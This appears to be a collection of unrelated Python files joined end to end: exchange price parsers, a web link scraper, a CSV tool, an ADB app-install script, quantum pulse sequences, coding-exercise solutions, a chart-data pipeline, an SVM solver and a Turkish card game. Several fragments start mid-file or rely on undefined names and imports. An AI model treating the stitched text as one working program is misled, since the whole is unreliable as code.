    def get_bid_prices(self, response_json: dict):
        """Read the highest-bid quote for every supported TRY pair."""
        self.bitcoin.set_bid(float(response_json['BTC_TL']['highestBid']))
        self.ethereum.set_bid(float(response_json['ETH_TL']['highestBid']))
        self.tezos.set_bid(float(response_json['XTZ_TL']['highestBid']))
        self.link.set_bid(float(response_json['LINK_TL']['highestBid']))
        self.stellar.set_bid(float(response_json['XLM_TL']['highestBid']))
        self.cosmos.set_bid(float(response_json['ATOM_TL']['highestBid']))
        self.usdt.set_bid(float(response_json['USDT_TL']['highestBid']))

    def get_ask_prices(self, response_json: dict):
        """Read the lowest-ask quote for every supported TRY pair."""
        self.bitcoin.set_ask(float(response_json['BTC_TL']['lowestAsk']))
        self.ethereum.set_ask(float(response_json['ETH_TL']['lowestAsk']))
        self.tezos.set_ask(float(response_json['XTZ_TL']['lowestAsk']))
        self.link.set_ask(float(response_json['LINK_TL']['lowestAsk']))
        self.stellar.set_ask(float(response_json['XLM_TL']['lowestAsk']))
        self.cosmos.set_ask(float(response_json['ATOM_TL']['lowestAsk']))
        # BUG FIX: USDT previously read 'highestBid' here, so its ask price
        # was silently set to the bid.
        self.usdt.set_ask(float(response_json['USDT_TL']['lowestAsk']))
class BTCTURK(exchange):
    """BtcTurk (TRY-quoted) exchange: fees and ticker parsing.

    NOTE(review): parsing relies on fixed positions inside the 'data' array
    of the btcturk ticker response (e.g. index 0 = BTC, 30 = XTZ). Any
    reordering of pairs by the API silently maps prices to the wrong coins —
    verify the indices against the live API.
    """

    def __init__(self, exchange_url: str = 'https://api.btcturk.com/api/v2/ticker'):
        super().__init__(exchange_url, "BTCTURK")
        self.maker_fee = (0.10 / 100)
        self.taker_fee = (0.18 / 100)
        # Coin objects; the constructor argument is the withdrawal fee.
        self.bitcoin = coins.Bitcoin(0)
        self.ethereum = coins.Ethereum(0)
        self.tezos = coins.Tezos(0)
        self.link = coins.Link(0)
        self.stellar = coins.Stellar(0)
        self.cosmos = coins.Cosmos(0)
        self.usdt = coins.USDT(0)
        self.populate_coin_list()

    # Redundant pass-through overrides of get_supported_coins,
    # populate_coin_list and refresh removed; the inherited versions
    # are identical.

    def get_bid_prices(self, response_json: dict):
        self.bitcoin.set_bid(float(response_json['data'][0]['bid']))
        self.tezos.set_bid(float(response_json['data'][30]['bid']))
        self.link.set_bid(float(response_json['data'][24]['bid']))
        self.ethereum.set_bid(float(response_json['data'][2]['bid']))
        self.cosmos.set_bid(float(response_json['data'][27]['bid']))
        self.stellar.set_bid(float(response_json['data'][10]['bid']))
        self.usdt.set_bid(float(response_json['data'][5]['bid']))

    def get_ask_prices(self, response_json: dict):
        self.bitcoin.set_ask(float(response_json['data'][0]['ask']))
        self.tezos.set_ask(float(response_json['data'][30]['ask']))
        self.link.set_ask(float(response_json['data'][24]['ask']))
        self.ethereum.set_ask(float(response_json['data'][2]['ask']))
        self.cosmos.set_ask(float(response_json['data'][27]['ask']))
        self.stellar.set_ask(float(response_json['data'][10]['ask']))
        self.usdt.set_ask(float(response_json['data'][5]['ask']))
class KRAKEN(exchange):
    """Kraken (EUR-quoted) exchange: fees, withdrawal costs, and ticker parsing.

    In Kraken's ticker payload 'b' is the best bid and 'a' the best ask,
    each given as [price, whole-lot-volume, lot-volume].
    """

    def __init__(self, exchange_url: str = 'https://api.kraken.com/0/public/Ticker?pair=xbteur,xtzeur,linkeur,etheur,atomeur,xlmeur,usdteur'):
        super().__init__(exchange_url, "KRAKEN")
        self.maker_fee = (0.16 / 100)
        self.taker_fee = (0.26 / 100)
        # Coin objects; the constructor argument is the withdrawal fee.
        self.bitcoin = coins.Bitcoin(0.0005)
        self.ethereum = coins.Ethereum(0.005)
        self.tezos = coins.Tezos(0.2)
        self.link = coins.Link(0.12)
        self.stellar = coins.Stellar(0.00002)
        self.cosmos = coins.Cosmos(0.1)
        self.usdt = coins.USDT(5)
        self.populate_coin_list()

    # Redundant pass-through overrides of get_supported_coins,
    # populate_coin_list and refresh removed; the inherited versions
    # are identical.

    def get_bid_prices(self, response_json: dict):
        self.bitcoin.set_bid(float(response_json['result']['XXBTZEUR']['b'][0]))
        self.tezos.set_bid(float(response_json['result']['XTZEUR']['b'][0]))
        self.link.set_bid(float(response_json['result']['LINKEUR']['b'][0]))
        self.ethereum.set_bid(float(response_json['result']['XETHZEUR']['b'][0]))
        self.cosmos.set_bid(float(response_json['result']['ATOMEUR']['b'][0]))
        self.stellar.set_bid(float(response_json['result']['XXLMZEUR']['b'][0]))
        self.usdt.set_bid(float(response_json['result']['USDTEUR']['b'][0]))

    def get_ask_prices(self, response_json: dict):
        self.bitcoin.set_ask(float(response_json['result']['XXBTZEUR']['a'][0]))
        self.tezos.set_ask(float(response_json['result']['XTZEUR']['a'][0]))
        self.link.set_ask(float(response_json['result']['LINKEUR']['a'][0]))
        self.ethereum.set_ask(float(response_json['result']['XETHZEUR']['a'][0]))
        self.cosmos.set_ask(float(response_json['result']['ATOMEUR']['a'][0]))
        self.stellar.set_ask(float(response_json['result']['XXLMZEUR']['a'][0]))
        # BUG FIX: USDT previously read the bid field ('b'), so its ask price
        # was silently set to the bid.
        self.usdt.set_ask(float(response_json['result']['USDTEUR']['a'][0]))
class BINANCE(exchange):
    """Binance (EUR-quoted) exchange: only BTC and ETH are populated.

    NOTE(review): the remaining coin attributes stay None, so the inherited
    populate_coin_list() places None entries in supported_coins — callers
    iterating that list must tolerate them; confirm this is intended.
    """

    def __init__(self, exchange_url: str = 'https://api.binance.com/api/v3/ticker/bookTicker'):
        super().__init__(exchange_url, "BINANCE")
        self.maker_fee = (0.10 / 100)
        self.taker_fee = (0.10 / 100)
        # Coin objects; the constructor argument is the withdrawal fee.
        self.bitcoin = coins.Bitcoin(0.0004)
        self.ethereum = coins.Ethereum(0.008)
        self.populate_coin_list()

    # Redundant pass-through overrides of get_supported_coins,
    # populate_coin_list and refresh removed; the inherited versions
    # are identical.

    def get_bid_prices(self, response_json: dict):
        """Scan the full book-ticker array for the pairs we track."""
        for entry in response_json:
            symbol = entry['symbol']
            # elif: a single entry can only match one symbol.
            if symbol == 'BTCEUR':
                self.bitcoin.set_bid(float(entry['bidPrice']))
            elif symbol == 'ETHEUR':
                self.ethereum.set_bid(float(entry['bidPrice']))

    def get_ask_prices(self, response_json: dict):
        for entry in response_json:
            symbol = entry['symbol']
            if symbol == 'BTCEUR':
                self.bitcoin.set_ask(float(entry['askPrice']))
            elif symbol == 'ETHEUR':
                self.ethereum.set_ask(float(entry['askPrice']))
class exchange_aggregator:
    """Instantiates every supported exchange and groups them by quote currency."""

    def __init__(self):
        self.paribu = PARIBU()
        self.kraken = KRAKEN()
        self.btcturk = BTCTURK()
        self.binance = BINANCE()
        # EUR-quoted venues.
        self.euro_exchange_list = [
            self.kraken,
            self.binance,
        ]
        # TRY-quoted venues.
        self.try_exchange_list = [
            self.paribu,
            self.btcturk,
        ]

    def get_turkish_exchanges_list(self) -> list:
        # Annotation fixed: this returns a list of exchange objects,
        # not a single exchange.
        return self.try_exchange_list

    def get_european_exchanges_list(self) -> list:
        return self.euro_exchange_list
from bs4 import BeautifulSoup
from urllib.request import urlopen
# Fetch the Wikipedia main page and print every anchor's href, numbered
# from 1; anchors without an href fall back to '/'.
response = urlopen("https://en.wikipedia.org/wiki/Main_Page")
soup = BeautifulSoup(response, 'html.parser')
# enumerate() replaces the manual `i = i + 1` counter.
for i, anchor in enumerate(soup.find_all("a"), start=1):
    print(str(i) + ' ' + anchor.get('href', '/'))
#!/usr/bin/env python
"""
===============
%(PROG)s
===============
-------------------------------------------------------------
Collapse multiple rows having the same key into a single row
-------------------------------------------------------------
:Author: skipm@trdlnk.com
:Date: 2016-08-26
:Copyright: TradeLink LLC 2016
:Version: 0.1
:Manual section: 1
:Manual group: data filters
SYNOPSIS
========
%(PROG)s -k f1,f2,f3,...
OPTIONS
=======
-k names comma-separated list of field names
DESCRIPTION
===========
For each row in stdin which has identical values for the given key(s),
collapse them into one row. Values in later rows overwrite values in
earlier rows. Output is to stdout. To be collapsed, rows with
identical key(s) must be adjacent to one another.
EXAMPLE
=======
Given this CSV file:
time,pos1,pos2,pos3
11:00,,-1,3
12:00,1,,1
12:00,,1,2
running csvcollapse -k time will emit this CSV file to stdout:
time,pos1,pos2,pos3
11:00,,-1,3
12:00,1,1,2
This program is often used to collapse rows with common keys in the
output of csvmerge.
SEE ALSO
========
* csvmerge
* csv2csv
"""
from __future__ import absolute_import
from __future__ import print_function
import csv
import sys
import getopt
import os
PROG = os.path.split(sys.argv[0])[1]
def usage(msg=None):
    """Print an optional message, then the module docstring, to stderr."""
    err = sys.stderr
    if msg is not None:
        print(msg, file=err)
        print(file=err)
    # %(PROG)s inside the docstring is filled from module globals.
    print(__doc__.strip() % globals(), file=err)
def main(args):
    """Collapse adjacent stdin CSV rows sharing the same key column(s).

    -k names : comma-separated list of key field names
    -h       : print usage and exit

    Later rows win: any non-empty cell overwrites the accumulated value for
    that field. Output goes to stdout. Returns the process exit status (0).
    """
    keys = ()
    opts, _args = getopt.getopt(args, "k:h")
    for opt, arg in opts:
        if opt == "-k":
            keys = tuple(arg.split(","))
        elif opt == "-h":
            usage()
            return 0

    reader = csv.DictReader(sys.stdin)
    writer = csv.DictWriter(sys.stdout, fieldnames=reader.fieldnames)
    writer.writeheader()

    prev_key = ()
    merged = {}
    for row in reader:
        current_key = tuple(row.get(k) for k in keys)
        if current_key != prev_key:
            # Key changed: flush the group accumulated so far.
            prev_key = current_key
            if merged:
                writer.writerow(merged)
            merged.clear()
        # Non-empty cells from later rows overwrite earlier ones.
        for field, value in row.items():
            if value:
                merged[field] = value
    if merged:
        writer.writerow(merged)
    return 0
if __name__ == "__main__":
    # Exit with main()'s status so shell pipelines can detect failure.
    sys.exit(main(sys.argv[1:]))
|
import subprocess
from adb_interaction import ADB
import adb_keyevents
import time
# Drive two devices: one through the project's ADB wrapper and one through
# the raw adb CLI.
# NOTE(review): the wrapper connects to .158 while the raw calls target
# .172 — confirm the two hosts are intentional.
adb = ADB("evolve")
adb.adb_connect("10.100.15.158")
# BUG FIX: subprocess.call with a single command string requires shell=True
# on POSIX; passing an argument list works everywhere and avoids the shell.
subprocess.call(["adb", "connect", "10.100.15.172"])
subprocess.call(["adb", "devices"])
subprocess.call(["adb", "install", "-r", "WatchTV-debug.apk"])
|
from ..PulsePrimitives import *
from ..Compiler import compile_to_hardware
from ..PulseSequencePlotter import plot_pulse_files
import QGL.PulseShapes
def RabiAmp(qubit, amps, phase=0, showPlot=False):
    """
    Variable amplitude Rabi nutation experiment.

    Parameters
    ----------
    qubit : logical channel to implement sequence (LogicalChannel)
    amps : pulse amplitudes to sweep over (iterable)
    phase : phase of the pulse (radians)
    showPlot : whether to plot (boolean)

    Returns
    -------
    plotHandle : handle to plot window to prevent destruction
    """
    # One sequence per amplitude: a rotation pulse followed by a measurement.
    seqs = []
    for amp in amps:
        seqs.append([Utheta(qubit, amp=amp, phase=phase), MEAS(qubit)])
    fileNames = compile_to_hardware(seqs, 'Rabi/Rabi')
    print(fileNames)
    if not showPlot:
        return
    return plot_pulse_files(fileNames)
def RabiWidth(qubit, widths, amp=1, phase=0, shapeFun=QGL.PulseShapes.tanh, showPlot=False):
    """
    Variable pulse width Rabi nutation experiment.

    Parameters
    ----------
    qubit : logical channel to implement sequence (LogicalChannel)
    widths : pulse widths to sweep over (iterable)
    amp : pulse amplitude (default = 1)
    phase : phase of the pulse (radians, default = 0)
    shapeFun : shape of pulse (function, default = PulseShapes.tanh)
    showPlot : whether to plot (boolean)

    Returns
    -------
    plotHandle : handle to plot window to prevent destruction
    """
    # One sequence per width: a shaped rotation pulse followed by a measurement.
    seqs = [
        [Utheta(qubit, length=width, amp=amp, phase=phase, shapeFun=shapeFun),
         MEAS(qubit)]
        for width in widths
    ]
    fileNames = compile_to_hardware(seqs, 'Rabi/Rabi')
    print(fileNames)
    if not showPlot:
        return
    return plot_pulse_files(fileNames)
|
# coding:utf-8
# Remove Duplicates from Sorted Array: drop repeated items from a sorted list in place.
# Python 2 script: raw_input() reads a line and map() returns a list here.
nums=map(int,raw_input().split())
def removeDuplicates(nums):
    """Remove duplicates from a sorted list in place and return the new length.

    :type nums: List[int]
    :rtype: int
    """
    total = len(nums)
    if total <= 1:
        return total
    write = 1
    # Each step either deletes the duplicate sitting at `write` or advances
    # past a unique value; exactly total-1 comparisons happen overall.
    for _ in range(1, total):
        if nums[write] == nums[write - 1]:
            del nums[write]
        else:
            write += 1
    return write
# Python 2 print statement; emits the new logical length of nums.
print removeDuplicates(nums)
"""
1 1 2 3 2
3
题目:
给定一个排序数组,删除重复的位置,使每个元素只出现一次并返回新的长度。
不要为另一个数组分配额外的空间,必须使用常量内存来做到这一点。
例如,
给定输入数组nums = [1,1,2]
您的函数应返回length = 2,num的前两个元素分别为1和2。超出了新的长度也没关系。
分析:
不能直接返回len(set(nums)),因为测试时要对比nums,而不只是len
""" |
# coding: utf-8
# In[1]:
import pandas as pd
# In[2]:
def clean_data(df):
    """Normalize a raw Billboard chart frame.

    Renames 'artist' to 'artist_long', strips any 'featuring ...' suffix into
    a clean 'artist' column, builds a 'song%artist' ID, drops rows missing
    song or artist, and returns the columns [date, rank, ID, song, artist].
    """
    df = df.rename(columns={'artist': 'artist_long'})
    try:
        df["artist"] = df["artist_long"].map(lambda x: x.split('featuring')[0])
    except (AttributeError, TypeError):
        # Non-string entries (e.g. NaN) cannot be split; keep values as-is.
        # (Was a bare `except:`, which also swallowed KeyboardInterrupt etc.)
        df["artist"] = df["artist_long"].map(lambda x: x)
    df["ID"] = df["song"] + "%" + df["artist"]
    col_name = ['date', 'rank', 'ID', 'song', 'artist']
    df = df[~df['artist'].isnull()]
    df = df[~df['song'].isnull()]
    return df[col_name]  # .drop_duplicates()
# In[3]:
def remove_duplicates(df_clean):
    """Drop one known duplicated chart row (Heartless / KANYE WEST, 2009-06-06, rank 79)."""
    is_known_dup = (
        (df_clean['ID'] == "Heartless%KANYE WEST")
        & (df_clean['date'] == "2009-06-06")
        & (df_clean['rank'] == 79)
    )
    return df_clean[~is_known_dup]
# In[4]:
def wide_pivot(df_long):
    """Pivot the long (ID, date, rank) frame into one wide row per song.

    Resulting columns are 0..N-1 (one per chart date, holding the rank;
    101 = off the chart that week) followed by ID, song, artist.
    """
    # Keyword arguments: positional pivot() arguments were removed in
    # pandas 2.0.
    df = df_long.pivot(index='ID', columns='date', values='rank')
    df["ID"] = df.index
    df["song"] = df["ID"].map(lambda x: x.split('%')[0])
    df["artist"] = df["ID"].map(lambda x: x.split('%')[1])
    # 101 marks weeks where the song was not on the (top-100) chart.
    df.fillna(101, inplace=True)
    # Flat column list. The original wrapped it in an extra list and relied
    # on Python 2's list-returning range(), which breaks on Python 3.
    df.columns = list(range(len(df.columns) - 3)) + ['ID', 'song', 'artist']
    return df
# In[5]:
def get_est_form(df, n=4):
    """Extract movement-pattern training rows from the wide chart frame.

    For every window of n+1 consecutive weekly ranks that are all on the
    chart (< 101), record the up/down/flat pattern of the first n-1 moves,
    the rank before the final move, and the final move as the target.
    Also writes the result to pattern_<n>.csv in the working directory.
    """
    data = []
    # The last 3 columns are ID/song/artist, not weekly ranks.
    num_windows = len(df.columns) - n - 3
    # range() instead of Python-2-only xrange(); the np.product() test was
    # replaced with all() — numpy was never imported in this script, so the
    # original raised NameError at the first on-chart window.
    for k in range(len(df)):
        df_row = df[df.index == df.index[k]]
        for start in range(num_windows):
            ser = [df_row[j].values[0] for j in range(start, start + n + 1)]
            # Only keep windows where every week is actually on the chart.
            if all(rank < 101 for rank in ser):
                diff = []
                # Inner index renamed (the original reused `i` and shadowed
                # the outer loop variable).
                for j in range(len(ser) - 1):
                    if ser[j + 1] - ser[j] > 0:
                        value = -1   # rank number rose -> song moved down
                    elif ser[j + 1] - ser[j] < 0:
                        value = 1    # rank number fell -> song moved up
                    else:
                        value = 0
                    diff.append(value)
                data.append(diff[:-1] + [ser[n - 1]] + [diff[-1]])
    result = pd.DataFrame(data)
    # Flat column list (the original nested it in an extra list).
    result.columns = ["diff_{}".format(i) for i in range(result.shape[1] - 2)] + ['rank', 'target']
    file_name = "pattern_{}.csv".format(n)
    result.to_csv(file_name, sep=',', encoding='utf-8')
    return result
# In[6]:
def get_ngram_form(df, n=4, name="../data/ngram"):
    """Extract raw n-gram rank sequences from the wide chart frame.

    Each sample is n consecutive on-chart ranks (< 101) plus the following
    rank (which may be 101 = dropped off the chart) as the target.
    Also writes the result to <name>_<n>.csv.
    """
    data = []
    # The last 3 columns are ID/song/artist, not weekly ranks.
    num_windows = len(df.columns) - n - 3
    # range() instead of Python-2-only xrange(); all() replaces np.product()
    # (numpy was never imported in this script, so the original raised
    # NameError at the first on-chart window).
    for k in range(len(df)):
        df_row = df[df.index == df.index[k]]
        for start in range(num_windows):
            ser = [df_row[j].values[0] for j in range(start, start + n + 1)]
            # Only the history (all but the target) must be fully on-chart.
            if all(rank < 101 for rank in ser[:-1]):
                data.append(ser)
    result = pd.DataFrame(data)
    # Flat column list (the original nested it in an extra list).
    result.columns = ["diff_{}".format(i) for i in range(result.shape[1] - 1)] + ['target']
    file_name = name + "_{}.csv".format(n)
    result.to_csv(file_name, sep=',', encoding='utf-8')
    return result
# # Run code
# ### Get data with type of ngram ( number in ngram = order)
# In[7]:
# Pipeline: load the 1990-2009 chart dump, clean it, de-duplicate, pivot to
# wide form, then emit n-gram files for every order 1..10 (Python 2 print).
df_raw = pd.read_csv("../data/billboard_result_19900106_20091226.csv")
#df_raw = pd.read_csv("../data/billboard_result_20100102_20160423.csv")
df_clean = clean_data(df_raw)
df_clean = remove_duplicates(df_clean)
df = wide_pivot(df_clean)
for i in range(1, 11):
    print "i: {}".format(i)
    get_ngram_form(df, n=i, name="../data/ngram_1990_2009")
# In[ ]:
|
"""
set
list
tuple
set
dictionary (dict)
"""
# 1st
# 'apple'
# 2nd
# 'pineapple'
# 3rd
# 'orange'
# A set literal: curly braces with comma-separated items.
fruitset = {'apple','pineapple','orange'}
print(fruitset)
# unordered collection of items
# it cannot hold duplicated items
# unique item
numberset = {1,1,4,4,6,6}
print(numberset)
# how to create an empty set
# CAUTION: {} creates an empty dict, not an empty set (shown by type()).
set1 = {}
print(set1, type(set1))
# set() is the only way to make an empty set.
set2 = set()
print(set2, type(set2))
# set itself is mutable (changeable)
# items in a set are immutable (unchangeable)
# A tuple is hashable, so it may be a set member; a list (below) may not.
set3 = {'a',1,True,('a','b')}
print(set3)
# set4 = {'a',2,True, ['a','b']}
|
import numpy as np
import random as rnd
import time as tm
from matplotlib import pyplot as plt
import math
# You may define any new functions, variables, classes here
# For example, functions to calculate next coordinate or step length
# def steplength(eta, t):
# return eta/t
def grad(theta, C, X, y):
    """Single-sample stochastic gradient direction for the squared-hinge C-SVM objective.

    Picks one training example uniformly at random; theta is [w; b] and X is
    expected to carry a ones column for the bias.
    """
    n, d = X.shape
    idx = rnd.randint(0, n - 1)
    sample = X[idx, :]
    margin = (sample.dot(theta)) * y[idx]
    # Squared hinge: the gradient is nonzero only inside the margin.
    slope = 2 * (1 - margin) if margin < 1 else 0
    return theta - (C * n * sample * slope * y[idx])
def batch_grad(theta, C, X, y, B):
    """Mini-batch (size B, without replacement) gradient direction for the
    squared-hinge C-SVM objective; theta is [w; b]."""
    n, d = X.shape
    # Sample B distinct row indices uniformly at random.
    chosen = rnd.sample(range(0, n), B)
    Xb = X[chosen, :]
    yb = y[chosen]
    margins = np.multiply(Xb.dot(theta), yb)
    # Indicator vector: -1 for samples inside the margin, 0 otherwise.
    active = np.zeros((B,))
    active[margins < 1] = -1
    # Scale by n/B so the mini-batch estimate is unbiased for the full sum.
    return theta + C * (n / B) * 2 * (active * Xb.T).dot(np.multiply(yb, (1 - margins)))
def getObj(X, y, theta, C):
    """Squared-hinge C-SVM objective: 0.5*||w||^2 + C * sum(max(0, 1 - y*(X@theta))^2).

    theta is [w; b]: the last entry is the bias, excluded from the
    regularizer (X is expected to carry a ones column for the bias).
    """
    weights = theta[:-1]
    scores = X.dot(theta)
    losses = np.maximum(1 - np.multiply(scores, y), 0)
    return 0.5 * weights.dot(weights) + C * losses.dot(losses)
def solver1( X, y, C, timeout, spacing ):
    """Mini-batch SGD solver for the squared-hinge C-SVM.

    Appends a ones column to X so the bias rides inside theta, then takes
    fixed-step mini-batch gradient steps until `timeout` seconds elapse
    (the clock is only checked every `spacing` iterations; the per-step
    objective bookkeeping below is excluded from that elapsed time).
    Returns (w, b, totTime, obj_SGD, time_SGD) on timeout.
    """
    (n, d) = X.shape
    # Homogeneous coordinates: bias b becomes the last component of theta.
    X = np.c_[X, np.ones(n)]
    d = d + 1
    t = 0
    totTime = 0
    totalTime = 0
    # w is the normal vector and b is the bias
    # These are the variables that will get returned once timeout happens
    # w = np.zeros( (d-1,) )
    # b = 0
    tic = tm.perf_counter()
    theta = np.zeros( (d,) )
    cumulative = theta
    w = theta[0:-1]
    b = theta[-1]
    # Fixed step size and mini-batch size (hand-tuned).
    eta = 0.000003
    B = 500
    obj_SGD = np.array([getObj(X, y, theta, C)])
    time_SGD = np.array([0])
    while True:
        t = t + 1
        if t % spacing == 0:
            toc = tm.perf_counter()
            totTime = totTime + (toc - tic)
            if totTime > timeout:
                # plt.plot( time_SGD, obj_SGD, color = 'r', linestyle = '-', label = "SGD" )
                # plt.xlabel( "Elapsed time (sec)" )
                # plt.ylabel( "C-SVM Objective value" )
                # plt.legend()
                # plt.ylim( 0, 20000 )
                # # plt.xlim( 0, timeout )
                # plt.show()
                # print(t)
                return (w, b, totTime, obj_SGD, time_SGD)
            else:
                tic = tm.perf_counter()
        tic1 = tm.perf_counter()
        # thetanew = theta - (grad(theta, C, X, y) * (eta/t))
        theta = theta - (batch_grad(theta, C, X, y, B) * (eta))
        # wnew = thetanew[0:-1]
        # bnew = thetanew[-1]
        # prev = getObj( X, y, theta, C )
        # new = getObj( X, y, thetanew, C )
        # print(new)
        # print(new, prev)
        # if new > prev:
        #     eta = eta/2
        #     continue
        # theta = thetanew
        toc1 = tm.perf_counter()
        totalTime = totalTime + toc1 - tic1
        # Record objective vs. pure optimization time (timing/plot overhead
        # excluded via tic1/toc1).
        obj_SGD = np.append(obj_SGD, getObj(X, y, theta, C))
        time_SGD = np.append(time_SGD, totalTime)
        # cumulative = cumulative + theta
        w = theta[0:-1]
        b = theta[-1]
    return (w, b, totTime) # This return statement will never be reached
# C = 1 |
"""
# Definition for a Node.
class Node(object):
def __init__(self, val=None, children=None):
self.val = val
self.children = children
"""
class Solution(object):
    """N-ary tree preorder traversal (LeetCode 589)."""

    # BUG FIX: renamed from `preorder` — the original file defined two
    # methods with the same name, so this recursive version was silently
    # shadowed by the iterative one and unreachable (dead code).
    def preorder_recursive(self, root):
        """
        :type root: Node
        :rtype: List[int]
        """
        res = []

        def recursive(node):
            if not node:
                return
            res.append(node.val)
            for child in node.children:
                recursive(child)

        recursive(root)
        return res

    # iteratively method (this is the definition callers previously got)
    def preorder(self, root):
        """
        :type root: Node
        :rtype: List[int]
        """
        from collections import deque
        res = []
        if not root:
            return res
        stack = deque()
        stack.append(root)
        while stack:
            node = stack.pop()
            res.append(node.val)
            # Push children reversed so the leftmost child is visited first.
            stack.extend(node.children[::-1])
        return res
|
class Tur_normalgame:
def __init__(self,oyuncu_el):
self.oyuncu = oyuncu_el
time.sleep(1)
print("\n\tTur sende")
global oyun_raporu
oyun_raporu += "\n\tTur sende\n"
time.sleep(1)
print("\n\tortanın değeri:\n\t{} {}".format(orta.type,orta.value))
oyun_raporu += "\n\tortanın değeri:\n\t{} {}\n".format(orta.type,orta.value)
time.sleep(2)
print("\n\tElinde {} kart var".format(len(self.oyuncu.cards)))
oyun_raporu += "\n\tElinde {} kart var\n".format(len(self.oyuncu.cards))
time.sleep(1)
print("\n\t{}".format([k.name for k in self.oyuncu.cards]))
oyun_raporu += "\n\t{}\n".format([k.name for k in self.oyuncu.cards])
self.olasi_hamleleri_bul_ng()
time.sleep(3)
if orta.value == 7:
cards_7 = []
for card in self.oyuncu.cards:
if card.value == 7:
cards_7.append(card)
kontrolt3 = 0
while kontrolt3 < 1:
cevap_tur3 = str(input("\n\tOyna!\n\t< kart çek / kart oyna >\n\t")).lower()
cevap_tur3.strip()
if cevap_tur3 == "kart çek":
kontrolt3 = 1
self.kart_cek_user_ng(orta.ortadaki_kart.mark7)
self.olasi_hamleleri_bul_ng()
elif cevap_tur3 == "kart oyna":
kontrolt3 = 1
kontrol_r3 = self.hamle_sec_user_ng7(cards_7)
if kontrol_r3 == 0:
kontrolt3 = 0
else:
kontrol_r3.mark7 += orta.ortadaki_kart.mark7
self.kart_oyna_user_ng(kontrol_r3)
else:
print("\n\tGeçerli bir cevap vermedin")
time.sleep(1)
print("\n\tBir daha dene")
time.sleep(1)
kontrolt1 = 0
kontrolt2 = 0
while kontrolt1 < 1:
cevap_tur1 = str(input("\n\tOyna!\n\t< kart çek / kart oyna >\n\t")).lower()
cevap_tur1.strip()
if cevap_tur1 == "kart çek":
kontrolt1 = 1
self.kart_cek_user_ng(1)
self.olasi_hamleleri_bul_ng()
elif cevap_tur1 == "kart oyna":
kontrolt1 = 1
kontrol_r1 = self.hamle_sec_user_ng()
if kontrol_r1 == 0:
kontrolt1 = 0
else:
self.kart_oyna_user_ng(kontrol_r1)
kontrolt2 = 1
else:
print("\n\tGeçerli bir cevap vermedin")
time.sleep(1)
print("\n\tBir daha dene")
time.sleep(1)
while kontrolt2 < 1:
cevap_tur2 = str(input("\n\tOyna!\n\t< kart oyna / turu bitir>\n\t")).lower()
cevap_tur2.strip()
if cevap_tur2 == "kart oyna":
kontrolt2 = 1
kontrol_r1 = self.hamle_sec_user_ng()
if kontrol_r1 == 0:
kontrolt2 = 0
else:
self.kart_oyna_user_ng(kontrol_r1)
elif cevap_tur2 == "turu bitir":
kontrolt2 = 1
time.sleep(1)
print("\n\tTurun bitti.\n")
else:
print("\n\tGeçerli bir cevap vermedin")
time.sleep(1)
print("\n\tBir daha dene")
time.sleep(1)
def olasi_hamleleri_bul_ng(self):
global oyun_raporu
self.hamleler = []
for card in self.oyuncu.cards:
if card.type == orta.type:
self.hamleler.append(card)
elif card.value == orta.value:
self.hamleler.append(card)
elif card.value == "vale":
self.hamleler.append(card)
if i < 4:
hamleler_ilk_tur = []
for card in self.hamleler:
if card.type != "sinek":
continue
if card.value == "as" or card.value == 7 or card.value == 10 or card.value == "vale":
continue
hamleler_ilk_tur.append(card)
self.hamleler = hamleler_ilk_tur
oyun_raporu += "olası hamleler: {}\n".format([h.name for h in self.hamleler])
def kart_cek_user_ng(self,a):
global deck
global oyun_raporu
try:
global orta
time.sleep(1)
oyun_raporu += "\ndeste uzunluğu, kart çekemeden önce: {}\n".format(len(deck))
cards_to_be_drawn = [deck.pop(0) for i in range(a)]
self.oyuncu.cards.extend(cards_to_be_drawn)
print("\n\t{} kart çektin".format(a))
oyun_raporu += "\n\t{} kart çektin\n".format(a)
time.sleep(1)
oyun_raporu += "deste uzunluğu, kart çektiktikten sonra: {}\n".format(len(deck))
print("\n\tÇektiğin kartlar\n\t{}".format([k.name for k in cards_to_be_drawn]))
oyun_raporu += "\n\tÇektiğin kartlar\n\t{}\n".format([k.name for k in cards_to_be_drawn])
if len(deck) < 8:
print("\ndestedeki kart sayısı: {}".format(len(deck)))
oyun_raporu += "\ndestedeki kart sayısı: {}\n".format(len(deck))
oyun_raporu += "ortadaki kart sayısı: {}\n".format(len(orta.ortada))
temporary_deck1 = orta.ortada[1:-1]
temporary_deck1 = shuffle_deck(temporary_deck1)
deck.extend(temporary_deck1)
Orta.ortada = [orta.ortada[0],orta.ortada[-1]]
for card in deck:
card.mark10 = ""
card.markAS = ""
card.mark7 = 2
print("ortadaki kağıtlar karılıp yeni deste yapıldı")
oyun_raporu += "ortadaki kağıtlar karılıp yeni deste yapıldı\n"
time.sleep(1)
print("destedeki kart sayısı:",len(deck))
oyun_raporu += "destedeki kart sayısı: {}\n".format(len(deck))
oyun_raporu += "Deste: {}\n".format([k.name for k in deck])
oyun_raporu += "ortada kalanlar: {}\n".format([k.name for k in orta.ortada])
time.sleep(2)
except Exception as hata :
print("\n\n\t\tKART ÇEK HATA VERDİ,\t adım: {},\n deste uzunluğu: {},\n ortanın uzunluğu: {},\n destedeki kartlar: {}\n\n".format(i,len(deck),len(orta.ortada),[k.name for k in deck]))
oyun_raporu += "\n\n\t\tKART ÇEK HATA VERDİ,\t adım: {},\n deste uzunluğu: {},\n ortanın uzunluğu: {},\n destedeki kartlar: {}\n".format(i,len(deck),len(orta.ortada),[k.name for k in deck])
print(hata)
oyun_raporu += "Hata: {}\n".format(hata)
def hamle_sec_user_ng(self):
global oyun_raporu
kontrol1 = 0
while kontrol1 < 1:
time.sleep(1)
print("\n\tElindeki kartlar:\n\t{}".format([k.name for k in self.oyuncu.cards]))
oyun_raporu += "\n\tElindeki kartlar:\n\t{}\n".format([k.name for k in self.oyuncu.cards])
cevap_hamle_sec = str(input("\n\tHangi kartı oynamak istersin?\n\tgeri dönmek istiyorsan <geri> yaz\n\t")).lower()
oyun_raporu += "\n\toynanmak istenen kart: {}\n".format(cevap_hamle_sec)
for card in self.hamleler:
if card.name == cevap_hamle_sec:
hamle = card
kontrol1 = 1
return hamle
if cevap_hamle_sec == "geri":
return 0
elif i < 4:
print("\n\tTur ilk kez sana geldi\n\tİlk turda 7'li, 10'lu, 'vale' veya 'as' oynayamazsın,\n\tve sadece 'sinek' oynayabilirsin")
time.sleep(2)
print("\n\tElinde uygun kart yoksa kart çek\n\t")
else:
print("\n\tOynayabileceğin bir kartı yazmadın")
oyun_raporu += "\n\tOynayabileceğin bir kartı yazmadın\n"
time.sleep(1)
